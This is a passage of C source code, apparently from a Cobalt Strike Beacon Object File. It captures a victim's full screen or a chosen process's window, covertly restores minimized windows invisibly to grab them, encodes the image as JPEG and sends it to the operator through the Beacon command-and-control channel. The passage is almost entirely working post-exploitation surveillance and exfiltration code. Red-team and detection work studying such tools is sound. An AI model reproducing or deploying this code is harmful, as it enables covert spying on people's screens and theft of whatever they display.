PFN_GdipGetImageHeight)(GpImage*, UINT*); 261 | typedef Status(WINAPI* PFN_GdipCloneBitmapAreaI)(INT, INT, INT, INT, PixelFormat, GpBitmap*, GpBitmap**); 262 | 263 | static PFN_GdiplusStartup pGdiplusStartup = NULL; 264 | static PFN_GdiplusShutdown pGdiplusShutdown = NULL; 265 | static PFN_GdipCreateBitmapFromHBITMAP pGdipCreateBitmapFromHBITMAP = NULL; 266 | static PFN_GdipDisposeImage pGdipDisposeImage = NULL; 267 | static PFN_GdipSaveImageToStream pGdipSaveImageToStream = NULL; 268 | static PFN_GdipBitmapLockBits pGdipBitmapLockBits = NULL; 269 | static PFN_GdipBitmapUnlockBits pGdipBitmapUnlockBits = NULL; 270 | static PFN_GdipGetImageWidth pGdipGetImageWidth = NULL; 271 | static PFN_GdipGetImageHeight pGdipGetImageHeight = NULL; 272 | static PFN_GdipCloneBitmapAreaI pGdipCloneBitmapAreaI = NULL; 273 | 274 | void ResolveGdiPlus() 275 | { 276 | HMODULE hGdiPlus = GetModuleHandleA("gdiplus.dll"); 277 | hGdiPlus = LoadLibraryA("gdiplus.dll"); 278 | pGdiplusStartup = (PFN_GdiplusStartup)GetProcAddress(hGdiPlus, "GdiplusStartup"); 279 | pGdiplusShutdown = (PFN_GdiplusShutdown)GetProcAddress(hGdiPlus, "GdiplusShutdown"); 280 | pGdipCreateBitmapFromHBITMAP = (PFN_GdipCreateBitmapFromHBITMAP)GetProcAddress(hGdiPlus, "GdipCreateBitmapFromHBITMAP"); 281 | pGdipDisposeImage = (PFN_GdipDisposeImage)GetProcAddress(hGdiPlus, "GdipDisposeImage"); 282 | pGdipSaveImageToStream = (PFN_GdipSaveImageToStream)GetProcAddress(hGdiPlus, "GdipSaveImageToStream"); 283 | pGdipBitmapLockBits = (PFN_GdipBitmapLockBits)GetProcAddress(hGdiPlus, "GdipBitmapLockBits"); 284 | pGdipBitmapUnlockBits = (PFN_GdipBitmapUnlockBits)GetProcAddress(hGdiPlus, "GdipBitmapUnlockBits"); 285 | pGdipGetImageWidth = (PFN_GdipGetImageWidth)GetProcAddress(hGdiPlus, "GdipGetImageWidth"); 286 | pGdipGetImageHeight = (PFN_GdipGetImageHeight)GetProcAddress(hGdiPlus, "GdipGetImageHeight"); 287 | pGdipCloneBitmapAreaI = (PFN_GdipCloneBitmapAreaI)GetProcAddress(hGdiPlus, "GdipCloneBitmapAreaI"); 288 | } 289 | 290 | //------------------------------------------------------------- 291 | // Download file over Beacon 292 | // credit: https://github.com/anthemtotheego/CredBandit/blob/e2e804a19a09003fa6a054a76f322adb32cd7adc/src/credBandit.c#L10 293 | //------------------------------------------------------------- 294 | void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) 295 | { 296 | time_t t; 297 | MSVCRT$srand((unsigned)MSVCRT$time(&t)); 298 | int fileId = MSVCRT$rand(); 299 | 300 | int messageLength = downloadFileNameLength + 8; 301 | char* packedData = (char*)MSVCRT$malloc(messageLength); 302 | 303 | /* Pack fileId (4 bytes) */ 304 | packedData[0] = (fileId >> 24) & 0xFF; 305 | packedData[1] = (fileId >> 16) & 0xFF; 306 | packedData[2] = (fileId >> 8) & 0xFF; 307 | packedData[3] = fileId & 0xFF; 308 | 309 | /* Pack fileSize (4 bytes) */ 310 | packedData[4] = (fileSize >> 24) & 0xFF; 311 | packedData[5] = (fileSize >> 16) & 0xFF; 312 | packedData[6] = (fileSize >> 8) & 0xFF; 313 | packedData[7] = fileSize & 0xFF; 314 | 315 | int packedIndex = 8; 316 | for (int i = 0; i < downloadFileNameLength; i++) { 317 | packedData[packedIndex++] = fileName[i]; 318 | } 319 | BeaconOutput(CALLBACK_FILE, packedData, messageLength); 320 | 321 | int chunkSize = 1024 * 900; 322 | if (fileSize > chunkSize) { 323 | int index = 0; 324 | while (index < fileSize) { 325 | if (fileSize - index > chunkSize) { 326 | int chunkLength = 4 + chunkSize; 327 | char* packedChunk = (char*)MSVCRT$malloc(chunkLength); 328 | packedChunk[0] = (fileId >> 24) & 0xFF; 329 | packedChunk[1] = (fileId >> 16) & 0xFF; 330 | packedChunk[2] = (fileId >> 8) & 0xFF; 331 | packedChunk[3] = fileId & 0xFF; 332 | int chunkIndex = 4; 333 | for (int i = index; i < index + chunkSize; i++) { 334 | packedChunk[chunkIndex++] = returnData[i]; 335 | } 336 | BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); 337 | free(packedChunk); 338 | } 339 | else { 340 | int lastChunkLength = fileSize - index + 4; 341 | char* lastChunk = (char*)MSVCRT$malloc(lastChunkLength); 342 | lastChunk[0] = (fileId >> 24) & 0xFF; 343 | lastChunk[1] = (fileId >> 16) & 0xFF; 344 | lastChunk[2] = (fileId >> 8) & 0xFF; 345 | lastChunk[3] = fileId & 0xFF; 346 | int lastChunkIndex = 4; 347 | for (int i = index; i < fileSize; i++) { 348 | lastChunk[lastChunkIndex++] = returnData[i]; 349 | } 350 | BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength); 351 | free(lastChunk); 352 | } 353 | index += chunkSize; 354 | } 355 | } 356 | else { 357 | int chunkLength = 4 + fileSize; 358 | char* packedChunk = (char*)MSVCRT$malloc(chunkLength); 359 | packedChunk[0] = (fileId >> 24) & 0xFF; 360 | packedChunk[1] = (fileId >> 16) & 0xFF; 361 | packedChunk[2] = (fileId >> 8) & 0xFF; 362 | packedChunk[3] = fileId & 0xFF; 363 | int chunkIndex = 4; 364 | for (int i = 0; i < fileSize; i++) { 365 | packedChunk[chunkIndex++] = returnData[i]; 366 | } 367 | BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); 368 | free(packedChunk); 369 | } 370 | 371 | char packedClose[4]; 372 | packedClose[0] = (fileId >> 24) & 0xFF; 373 | packedClose[1] = (fileId >> 16) & 0xFF; 374 | packedClose[2] = (fileId >> 8) & 0xFF; 375 | packedClose[3] = fileId & 0xFF; 376 | BeaconOutput(CALLBACK_FILE_CLOSE, packedClose, 4); 377 | 378 | free(packedData); 379 | } 380 | 381 | //------------------------------------------------------------- 382 | // Convert the given HBITMAP to a JPEG in memory using GDI+ 383 | // credit: https://github.com/WKL-Sec/HiddenDesktop/blob/14252f58e3f5379301f0d6334f92f8b96f321a16/client/scmain.c#L125 384 | //------------------------------------------------------------- 385 | BOOL BitmapToJpeg(HBITMAP hBitmap, int quality, int grayscale, BYTE** pJpegData, DWORD* pJpegSize) 386 | { 387 | ResolveGdiPlus(); 388 | if (!pGdiplusStartup || !pGdiplusShutdown || !pGdipCreateBitmapFromHBITMAP || 389 | !pGdipDisposeImage || !pGdipSaveImageToStream) 390 | { 391 | return FALSE; 392 | } 393 | 394 | 395 | GdiplusStartupInput gdiplusStartupInput; 396 | gdiplusStartupInput.GdiplusVersion = 1; 397 | gdiplusStartupInput.DebugEventCallback = NULL; 398 | gdiplusStartupInput.SuppressBackgroundThread = FALSE; 399 | gdiplusStartupInput.SuppressExternalCodecs = FALSE; 400 | 401 | ULONG_PTR gdiplusToken = 0; 402 | Status stat = pGdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL); 403 | if (stat != Ok) { 404 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] GdiplusStartup failed: %d", stat); 405 | return FALSE; 406 | } 407 | GpBitmap* pGpBitmap = NULL; 408 | stat = pGdipCreateBitmapFromHBITMAP(hBitmap, NULL, &pGpBitmap); 409 | if (stat != Ok) { 410 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] GdipCreateBitmapFromHBITMAP failed: %d", stat); 411 | pGdiplusShutdown(gdiplusToken); 412 | return FALSE; 413 | } 414 | 415 | if (grayscale) { 416 | UINT width = 0, height = 0; 417 | if (pGdipGetImageWidth && pGdipGetImageHeight) { 418 | Status wStatus = pGdipGetImageWidth((GpImage*)pGpBitmap, &width); 419 | Status hStatus = pGdipGetImageHeight((GpImage*)pGpBitmap, &height); 420 | if (wStatus != Ok || hStatus != Ok) { 421 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Failed to get image dimensions: wStatus=%d hStatus=%d", wStatus, hStatus); 422 | } 423 | } else { 424 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] GDI+ dimension helpers not resolved"); 425 | } 426 | 427 | if (width && height && pGdipBitmapLockBits && pGdipBitmapUnlockBits) { 428 | GpBitmap* pTarget = pGpBitmap; 429 | if (pGdipCloneBitmapAreaI) { 430 | GpBitmap* pCloned = NULL; 431 | Status cloneStatus = pGdipCloneBitmapAreaI(0, 0, (INT)width, (INT)height, PixelFormat24bppRGB, pGpBitmap, &pCloned); 432 | if (cloneStatus == Ok && pCloned) { 433 | pTarget = pCloned; 434 | } else { 435 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] GdipCloneBitmapAreaI failed: %d", cloneStatus); 436 | } 437 | } 438 | 439 | GpRect rect = { 0, 0, (INT)width, (INT)height }; 440 | BitmapData data; 441 | Status lockStatus = pGdipBitmapLockBits(pTarget, &rect, ImageLockModeWrite | ImageLockModeRead, PixelFormat24bppRGB, &data); 442 | if (lockStatus == Ok) { 443 | BYTE* scan0 = (BYTE*)data.Scan0; 444 | for (UINT y = 0; y < height; y++) { 445 | BYTE* row = scan0 + y * data.Stride; 446 | for (UINT x = 0; x < width; x++) { 447 | BYTE* px = row + x * 3; 448 | BYTE b = px[0], g = px[1], r = px[2]; 449 | BYTE gray = (BYTE)((r * 77 + g * 150 + b * 29) >> 8); 450 | px[0] = gray; 451 | px[1] = gray; 452 | px[2] = gray; 453 | } 454 | } 455 | pGdipBitmapUnlockBits(pTarget, &data); 456 | if (pTarget != pGpBitmap) { 457 | pGdipDisposeImage((GpImage*)pGpBitmap); 458 | pGpBitmap = pTarget; 459 | } 460 | } else { 461 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] GdipBitmapLockBits failed: %d", lockStatus); 462 | if (pTarget != pGpBitmap) { 463 | pGdipDisposeImage((GpImage*)pTarget); 464 | } 465 | } 466 | } 467 | } 468 | IStream* pStream = NULL; 469 | if (CreateStreamOnHGlobal(NULL, TRUE, &pStream) != S_OK) { 470 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] CreateStreamOnHGlobal failed"); 471 | pGdipDisposeImage((GpImage*)pGpBitmap); 472 | pGdiplusShutdown(gdiplusToken); 473 | return FALSE; 474 | } 475 | 476 | EncoderParameters encoderParams; 477 | encoderParams.Count = 1; 478 | CLSID clsidEncoderQuality = { 0x1d5be4b5, 0xfa4a, 0x452d, {0x9c,0xdd,0x5d,0xb3,0x51,0x05,0xe7,0xeb} }; 479 | encoderParams.Parameter[0].Guid = clsidEncoderQuality; 480 | encoderParams.Parameter[0].NumberOfValues = 1; 481 | encoderParams.Parameter[0].Type = EncoderParameterValueTypeLong; 482 | encoderParams.Parameter[0].Value = &quality; 483 | 484 | CLSID clsidJPEG = { 0x557cf401, 0x1a04, 0x11d3, {0x9a,0x73,0x00,0x00,0xf8,0x1e,0xf3,0x2e} }; 485 | 486 | stat = pGdipSaveImageToStream((GpImage*)pGpBitmap, pStream, &clsidJPEG, &encoderParams); 487 | if (stat != Ok) { 488 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] GdipSaveImageToStream failed: %d", stat); 489 | pStream->Release(); 490 | pGdipDisposeImage((GpImage*)pGpBitmap); 491 | pGdiplusShutdown(gdiplusToken); 492 | return FALSE; 493 | } 494 | 495 | LARGE_INTEGER liZero = { 0 }; 496 | ULARGE_INTEGER uliSize = { 0 }; 497 | if (pStream->Seek(liZero, STREAM_SEEK_END, &uliSize) != S_OK) { 498 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Seek to end failed"); 499 | pStream->Release(); 500 | pGdipDisposeImage((GpImage*)pGpBitmap); 501 | pGdiplusShutdown(gdiplusToken); 502 | return FALSE; 503 | } 504 | 505 | *pJpegSize = (DWORD)uliSize.QuadPart; 506 | *pJpegData = (BYTE*)malloc(*pJpegSize); 507 | if (!*pJpegData) { 508 | pStream->Release(); 509 | pGdipDisposeImage((GpImage*)pGpBitmap); 510 | pGdiplusShutdown(gdiplusToken); 511 | return FALSE; 512 | } 513 | 514 | if (pStream->Seek(liZero, STREAM_SEEK_SET, NULL) != S_OK) { 515 | free(*pJpegData); 516 | pStream->Release(); 517 | pGdipDisposeImage((GpImage*)pGpBitmap); 518 | pGdiplusShutdown(gdiplusToken); 519 | return FALSE; 520 | } 521 | 522 | ULONG bytesRead = 0; 523 | if (pStream->Read(*pJpegData, *pJpegSize, &bytesRead) != S_OK || bytesRead != *pJpegSize) { 524 | free(*pJpegData); 525 | pStream->Release(); 526 | pGdipDisposeImage((GpImage*)pGpBitmap); 527 | pGdiplusShutdown(gdiplusToken); 528 | return FALSE; 529 | } 530 | 531 | pStream->Release(); 532 | pGdipDisposeImage((GpImage*)pGpBitmap); 533 | pGdiplusShutdown(gdiplusToken); 534 | return TRUE; 535 | } 536 | 537 | //------------------------------------------------------------- 538 | // Save (or download) the given HBITMAP as a JPEG file with the provided filename 539 | //------------------------------------------------------------- 540 | BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName, int savemethod, int grayscale, int quality, int scale) 541 | { 542 | ResolveAPIs(); 543 | 544 | BYTE* jpegData = NULL; 545 | DWORD jpegSize = 0; 546 | HBITMAP hWork = hBitmap; 547 | HBITMAP hScaled = NULL; 548 | 549 | #ifndef HALFTONE 550 | #define HALFTONE 4 551 | #endif 552 | 553 | if (scale > 0 && scale != 100 && pGetObjectA && pCreateCompatibleDC && pCreateCompatibleBitmap && 554 | pSelectObject && pStretchBlt && pSetStretchBltMode && pGetDC && pReleaseDC) { 555 | BITMAP bm = { 0 }; 556 | if (pGetObjectA(hBitmap, sizeof(BITMAP), &bm)) { 557 | int newW = (bm.bmWidth * scale) / 100; 558 | int newH = (bm.bmHeight * scale) / 100; 559 | if (newW > 0 && newH > 0) { 560 | HDC hScreen = pGetDC(NULL); 561 | HDC hSrcDC = pCreateCompatibleDC(hScreen); 562 | HDC hDstDC = pCreateCompatibleDC(hScreen); 563 | HGDIOBJ oldSrc = pSelectObject(hSrcDC, hBitmap); 564 | hScaled = pCreateCompatibleBitmap(hScreen, newW, newH); 565 | if (hScaled) { 566 | HGDIOBJ oldDst = pSelectObject(hDstDC, hScaled); 567 | pSetStretchBltMode(hDstDC, HALFTONE); 568 | if (pStretchBlt(hDstDC, 0, 0, newW, newH, hSrcDC, 0, 0, bm.bmWidth, bm.bmHeight, SRCCOPY)) { 569 | hWork = hScaled; 570 | } 571 | pSelectObject(hDstDC, oldDst); 572 | } 573 | pSelectObject(hSrcDC, oldSrc); 574 | pDeleteDC(hSrcDC); 575 | pDeleteDC(hDstDC); 576 | pReleaseDC(NULL, hScreen); 577 | } 578 | } 579 | } 580 | 581 | 582 | if (!BitmapToJpeg(hWork, quality, grayscale, &jpegData, &jpegSize)) { 583 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Failed to convert bitmap to JPEG"); 584 | if (hScaled) 585 | pDeleteObject(hScaled); 586 | return FALSE; 587 | } 588 | if (hScaled) 589 | pDeleteObject(hScaled); 590 | 591 | if (savemethod == 0) { 592 | BeaconPrintf(CALLBACK_OUTPUT, "Saving JPEG to disk with filename %s", lpszFileName); 593 | HANDLE fh = pCreateFileA(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 594 | FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); 595 | if (fh == INVALID_HANDLE_VALUE) { 596 | free(jpegData); 597 | return FALSE; 598 | } 599 | DWORD dwWritten; 600 | pWriteFile(fh, (LPSTR)jpegData, jpegSize, &dwWritten, NULL); 601 | pCloseHandle(fh); 602 | } 603 | else if (savemethod == 1) { 604 | BeaconPrintf(CALLBACK_OUTPUT, "Downloading JPEG over beacon as a file with filename %s", lpszFileName); 605 | downloadFile((char*)lpszFileName, (int)strlen(lpszFileName), (char*)jpegData, (int)jpegSize); 606 | } 607 | else if (savemethod == 2) { 608 | BeaconPrintf(CALLBACK_OUTPUT, "Downloading JPEG over beacon as a screenshot with filename %s", lpszFileName); 609 | 610 | DWORD session = -1; 611 | if (pGetCurrentProcessId && pProcessIdToSessionId) { 612 | pProcessIdToSessionId(pGetCurrentProcessId(), &session); 613 | } else { 614 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Failed to resolve GetCurrentProcessId or ProcessIdToSessionId"); 615 | } 616 | 617 | char* user = (char*)pgetenv("USERNAME"); 618 | char title[] = "Screenshot"; 619 | int userLength = MSVCRT$_snprintf(NULL, 0, "%s", user); 620 | int titleLength = MSVCRT$_snprintf(NULL, 0, "%s", title); 621 | 622 | downloadScreenshot((char*)jpegData, (int)jpegSize, 623 | session, 624 | (char*)title, titleLength, 625 | (char*)user, userLength); 626 | } 627 | else { 628 | BeaconPrintf(CALLBACK_ERROR, "Unknown savemethod specified: %d", savemethod); 629 | free(jpegData); 630 | return FALSE; 631 | } 632 | 633 | free(jpegData); 634 | return TRUE; 635 | } 636 | 637 | //------------------------------------------------------------- 638 | // Callback for EnumWindows. It gets a window handle from a PID. 639 | //------------------------------------------------------------- 640 | BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam) 641 | { 642 | /* lParam points to a two–element array: 643 | index 0: the target PID (stored as LONG_PTR) 644 | index 1: the found window handle (initially 0) 645 | */ 646 | LONG_PTR* params = (LONG_PTR*)lParam; 647 | DWORD targetPid = (DWORD)params[0]; 648 | DWORD windowPid = 0; 649 | pGetWindowThreadProcessId(hwnd, &windowPid); 650 | if (windowPid == targetPid && IsWindowVisible(hwnd)) { 651 | params[1] = (LONG_PTR)hwnd; 652 | return FALSE; 653 | } 654 | return TRUE; 655 | } 656 | 657 | //------------------------------------------------------------- 658 | // Given a PID, uses EnumWindows to find a matching window handle. 659 | //------------------------------------------------------------- 660 | HWND FindWindowByPID(DWORD pid, int debug) 661 | { 662 | ResolveAPIs(); 663 | LONG_PTR params[2]; 664 | params[0] = (LONG_PTR)pid; 665 | params[1] = 0; 666 | if (debug) 667 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] Enumerating windows for PID %d", pid); 668 | EnumWindows(EnumWindowsProc, (LPARAM)¶ms); 669 | if (debug) { 670 | if ((HWND)params[1]) 671 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] Found window handle: 0x%p", (HWND)params[1]); 672 | else 673 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] No window found for PID %d", pid); 674 | } 675 | return (HWND)params[1]; 676 | } 677 | 678 | //------------------------------------------------------------- 679 | // Capture the given window (by hwnd) into an HBITMAP. 680 | // If the window is minimized, it is temporarily restored. 681 | //------------------------------------------------------------- 682 | HBITMAP CaptureWindow(HWND hwnd, int debug) 683 | { 684 | ResolveAPIs(); 685 | if (debug) 686 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] Starting CaptureWindow for hwnd 0x%p", hwnd); 687 | 688 | WINDOWPLACEMENT wp = { 0 }; 689 | wp.length = sizeof(WINDOWPLACEMENT); 690 | if (!pGetWindowPlacement(hwnd, &wp)) { 691 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] GetWindowPlacement failed"); 692 | return NULL; 693 | } 694 | if (debug) 695 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] Window showCmd: %d", wp.showCmd); 696 | 697 | RECT captureRect; 698 | int width, height; 699 | BOOL success = FALSE; 700 | HDC hdcScreen = pGetDC(NULL); 701 | HDC hdcMem = pCreateCompatibleDC(hdcScreen); 702 | HBITMAP hBitmap = NULL; 703 | 704 | if (wp.showCmd == SW_SHOWMINIMIZED) { 705 | if (debug) 706 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] Window is minimized; restoring temporarily for capture"); 707 | 708 | LONG exStyle = GetWindowLong(hwnd, GWL_EXSTYLE); 709 | pSetWindowLongA(hwnd, GWL_EXSTYLE, exStyle | WS_EX_LAYERED | WS_EX_TOOLWINDOW); 710 | pSetLayeredWindowAttributes(hwnd, 0, 0, LWA_ALPHA); 711 | pShowWindow(hwnd, SW_RESTORE); 712 | pUpdateWindow(hwnd); 713 | pSleep(500); /* Allow time for rendering */ 714 | 715 | if (!pGetWindowRect(hwnd, &captureRect)) { 716 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] GetWindowRect failed (restored window)"); 717 | goto cleanup; 718 | } 719 | width = captureRect.right - captureRect.left; 720 | height = captureRect.bottom - captureRect.top; 721 | if (debug) 722 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] Restored window dimensions: %d x %d", width, height); 723 | if (width <= 0 || height <= 0) { 724 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Invalid window dimensions"); 725 | goto cleanup; 726 | } 727 | hBitmap = pCreateCompatibleBitmap(hdcScreen, width, height); 728 | if (!hBitmap) { 729 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Failed to create compatible bitmap"); 730 | goto cleanup; 731 | } 732 | pSelectObject(hdcMem, hBitmap); 733 | success = pPrintWindow(hwnd, hdcMem, PW_RENDERFULLCONTENT); 734 | if (!success) { 735 | if (debug) 736 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] PrintWindow failed; falling back to BitBlt"); 737 | success = pBitBlt(hdcMem, 0, 0, width, height, 738 | hdcScreen, captureRect.left, captureRect.top, SRCCOPY); 739 | if (!success) 740 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Both PrintWindow and BitBlt failed"); 741 | } 742 | /* Restore window state */ 743 | pShowWindow(hwnd, SW_MINIMIZE); 744 | pSetWindowLongA(hwnd, GWL_EXSTYLE, exStyle); 745 | pSetWindowPos(hwnd, NULL, 0, 0, 0, 0, 746 | SWP_NOMOVE | SWP_NOSIZE | SWP_NOZORDER | SWP_FRAMECHANGED); 747 | } 748 | else { 749 | if (!pGetWindowRect(hwnd, &captureRect)) { 750 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] GetWindowRect failed"); 751 | goto cleanup; 752 | } 753 | width = captureRect.right - captureRect.left; 754 | height = captureRect.bottom - captureRect.top; 755 | if (debug) 756 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] Window dimensions: %d x %d", width, height); 757 | if (width <= 0 || height <= 0) { 758 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Invalid window dimensions"); 759 | goto cleanup; 760 | } 761 | hBitmap = pCreateCompatibleBitmap(hdcScreen, width, height); 762 | if (!hBitmap) { 763 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Failed to create compatible bitmap"); 764 | goto cleanup; 765 | } 766 | pSelectObject(hdcMem, hBitmap); 767 | 768 | /* Attempt to use PrintWindow to capture the full contents, 769 | even if the window is in the background */ 770 | success = pPrintWindow(hwnd, hdcMem, PW_RENDERFULLCONTENT); 771 | if (!success) { 772 | if (debug) 773 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] PrintWindow failed; falling back to BitBlt"); 774 | success = pBitBlt(hdcMem, 0, 0, width, height, 775 | hdcScreen, captureRect.left, captureRect.top, SRCCOPY); 776 | if (!success) 777 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Both PrintWindow and BitBlt failed"); 778 | } 779 | } 780 | 781 | cleanup: 782 | if (hdcMem) 783 | pDeleteDC(hdcMem); 784 | if (hdcScreen) 785 | pReleaseDC(NULL, hdcScreen); 786 | if (!success) { 787 | if (hBitmap) 788 | pDeleteObject(hBitmap); 789 | if (debug) 790 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] CaptureWindow failed"); 791 | return NULL; 792 | } 793 | if (debug) 794 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] CaptureWindow succeeded"); 795 | return hBitmap; 796 | } 797 | 798 | //------------------------------------------------------------- 799 | // go: 800 | // BOF args: 801 | // 1. Filename 802 | // 2. Save method: 0 = save to disk, 1 = download via Beacon, 2 = downloadScreenshot. 803 | // 3. PID: if nonzero, capture that window; if zero, capture the full screen. 804 | //------------------------------------------------------------- 805 | #ifdef BOF 806 | int debug = 0; // enable debugging prints 807 | void go(char* buff, int len) 808 | { 809 | ResolveAPIs(); // Ensure API pointers are resolved 810 | 811 | datap parser; 812 | BeaconDataParse(&parser, buff, len); 813 | 814 | char* filename = BeaconDataExtract(&parser, NULL); 815 | int savemethod = BeaconDataInt(&parser); 816 | int pid = BeaconDataInt(&parser); 817 | int grayscale = BeaconDataInt(&parser); 818 | int quality = BeaconDataInt(&parser); 819 | int scale = BeaconDataInt(&parser); 820 | if (quality < 0) quality = 0; 821 | if (quality > 100) quality = 100; 822 | if (scale < 1) scale = 100; 823 | if (scale > 1000) scale = 1000; // cap to prevent huge allocations 824 | 825 | if (debug) 826 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] go() called with filename: %s, savemethod: %d, pid: %d, grayscale: %d, quality: %d, scale: %d, debug: %d", filename, savemethod, pid, grayscale, quality, scale, debug); 827 | 828 | BOOL dpi = SetProcessDPIAware(); // Set DPI awareness to fix incomplete screenshots 829 | 830 | HBITMAP hBitmap = NULL; 831 | if (pid != 0) { 832 | if (debug) 833 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] Attempting to capture window for PID %d", pid); 834 | HWND hwnd = FindWindowByPID((DWORD)pid, debug); 835 | if (hwnd == NULL) { 836 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Window with PID %d not found", pid); 837 | return; 838 | } 839 | hBitmap = CaptureWindow(hwnd, debug); 840 | if (hBitmap == NULL) { 841 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Failed to capture window with PID %d", pid); 842 | return; 843 | } 844 | } 845 | else { 846 | if (debug) 847 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] Capturing full screen"); 848 | int x1 = pGetSystemMetrics(SM_XVIRTUALSCREEN); 849 | int y1 = pGetSystemMetrics(SM_YVIRTUALSCREEN); 850 | int w = pGetSystemMetrics(SM_CXVIRTUALSCREEN); 851 | int h = pGetSystemMetrics(SM_CYVIRTUALSCREEN); 852 | HDC hScreen = pGetDC(NULL); 853 | if (hScreen == NULL) { 854 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] pGetDC(NULL) returned NULL. Last error: %lu", GetLastError()); 855 | return; 856 | } 857 | 858 | HDC hDC = pCreateCompatibleDC(hScreen); 859 | if (hDC == NULL) { 860 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] pCreateCompatibleDC failed. Last error: %lu", GetLastError()); 861 | pReleaseDC(NULL, hScreen); 862 | return; 863 | } 864 | hBitmap = pCreateCompatibleBitmap(hScreen, w, h); 865 | if (!hBitmap) { 866 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Failed to create full screen bitmap"); 867 | pReleaseDC(NULL, hScreen); 868 | pDeleteDC(hDC); 869 | return; 870 | } 871 | 872 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] GetDC: %p",hScreen); 873 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] CreateCompatibleDC returned: %p",hDC); 874 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] CreateCompatibleBitmap returned: %p",hBitmap); 875 | 876 | HGDIOBJ old_obj = pSelectObject(hDC, hBitmap); 877 | if (!pBitBlt(hDC, 0, 0, w, h, hScreen, x1, y1, SRCCOPY)) { 878 | DWORD errorCode = GetLastError(); 879 | BeaconPrintf(CALLBACK_ERROR, 880 | "[DEBUG] BitBlt failed for full screen capture. Error code: %lu", 881 | errorCode); 882 | 883 | 884 | BeaconPrintf(CALLBACK_ERROR, 885 | "[DEBUG] hDC: %p, hScreen: %p, old_obj: %p", 886 | hDC, hScreen, old_obj); 887 | BeaconPrintf(CALLBACK_ERROR, 888 | "[DEBUG] Screen region: x1: %d, y1: %d, width: %d, height: %d", 889 | x1, y1, w, h); 890 | 891 | 892 | if (hScreen == NULL) { 893 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] hScreen is NULL (handle invalid)"); 894 | } else { 895 | DWORD flags = 0; 896 | if (!pGetHandleInformation(hScreen, &flags)) { 897 | DWORD errorCode = GetLastError(); 898 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] hScreen appears invalid (pGetHandleInformation failed) - Error code: %lu",errorCode); 899 | } else { 900 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] hScreen is valid (flags: 0x%lx)", flags); 901 | } 902 | } 903 | 904 | // Check hDC 905 | if (hDC == NULL) { 906 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] hDC is NULL (handle invalid)"); 907 | } else { 908 | DWORD flags = 0; 909 | if (!pGetHandleInformation(hDC, &flags)) { 910 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] hDC appears invalid (pGetHandleInformation failed) - Error code: %lu",errorCode); 911 | } else { 912 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] hDC is valid (flags: 0x%lx)", flags); 913 | } 914 | } 915 | } 916 | pSelectObject(hDC, old_obj); 917 | pDeleteDC(hDC); 918 | pReleaseDC(NULL, hScreen); 919 | } 920 | 921 | if (hBitmap) { 922 | if (debug) 923 | BeaconPrintf(CALLBACK_OUTPUT, "[DEBUG] Captured bitmap successfully; saving/downloading as %s", filename); 924 | if (!SaveHBITMAPToFile(hBitmap, filename, savemethod, grayscale, quality, scale)) 925 | BeaconPrintf(CALLBACK_ERROR, "[DEBUG] Failed to save JPEG"); 926 | else 927 | BeaconPrintf(CALLBACK_OUTPUT, "Screenshot saved/downloaded successfully", filename); 928 | pDeleteObject(hBitmap); 929 | } 930 | } 931 | #else 932 | void main(int argc, char* argv[]) 933 | { 934 | /* Non-BOF main() implementation (if needed) */ 935 | } 936 | #endif 